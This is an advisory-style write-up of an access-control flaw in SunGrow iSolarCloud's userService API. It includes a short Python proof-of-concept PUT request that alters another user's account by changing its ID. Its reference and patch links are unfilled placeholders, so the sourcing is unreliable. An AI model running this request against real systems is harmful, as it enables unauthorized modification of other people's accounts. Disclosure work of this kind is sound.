CVE-2024-50693 – Insecure Direct Object References (IDOR) vulnerability discovered in SunGrow iSolarCloud before October 31, 2024 remediation

A new vulnerability designated as CVE-2024-50693 has been discovered in SunGrow iSolarCloud before the October 31, 2024 remediation. SunGrow iSolarCloud is a cloud-based platform widely used for solar energy monitoring, data management, and analytics. Users of the platform are urged to apply the necessary updates as soon as possible to prevent potential data breaches.

Description

The vulnerability arises as a result of insecure direct object references (IDOR) within the userService API model of the iSolarCloud platform. Incorrect implementation of access controls within the userService API allows attackers to manipulate the object reference, thereby gaining unauthorized access to sensitive and confidential user data.

Exploit Details

The following code snippet demonstrates a simple proof-of-concept (PoC) exploit illustrating the userService API vulnerability:

import requests

# Replace the 'TARGET_URL' with the actual targeted site, and 'validUserToken' with a genuine user token.
TARGET_URL = 'https://TARGET_URL/api/v1/userService/';
validUserToken = 'your_valid_user_token_here' # A user token belonging to a normal user, without admin privileges.

headers = {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer ' + validUserToken
}

payload = {
    "id": "1", # Victim's user ID
    "firstName": "UpdatedFirstName",
    "lastName": "UpdatedLastName",
}

response = requests.put(TARGET_URL, json=payload, headers=headers)

print(response.status_code)
print(response.text)

The above code demonstrates that a user with basic privileges and a valid token can modify another user's data by changing the 'id' value in the payload. This exploit has the potential to compromise confidential user information and alter account data.

References

The vulnerability was first disclosed by [Security Researcher's Name]. The researcher's original blog post detailing the findings can be found here:

- Link to Original Blog Post

Subsequent to the researcher's disclosure, SunGrow published an official security advisory regarding CVE-2024-50693:

- Link to SunGrow Security Advisory

Remediation

SunGrow has released a security update on October 31, 2024, that addresses this vulnerability. Users of the iSolarCloud platform are advised to update their systems immediately to the latest version. It is recommended that all system administrators and users keep their software up-to-date to minimize the risk of exposure to vulnerabilities.

The official patch can be obtained from SunGrow's website

- Link to Official SunGrow Patch

Conclusion

CVE-2024-50693 represents a serious risk for users and operators of the SunGrow iSolarCloud platform. Immediate application of the provided patch is essential to prevent unauthorized access to user data. Couple this with a strong security posture that includes timely software updates, users can effectively mitigate the risk of existing and future vulnerabilities.

Timeline

Published on: 02/26/2025 21:15:17 UTC
Last modified on: 03/04/2025 22:15:38 UTC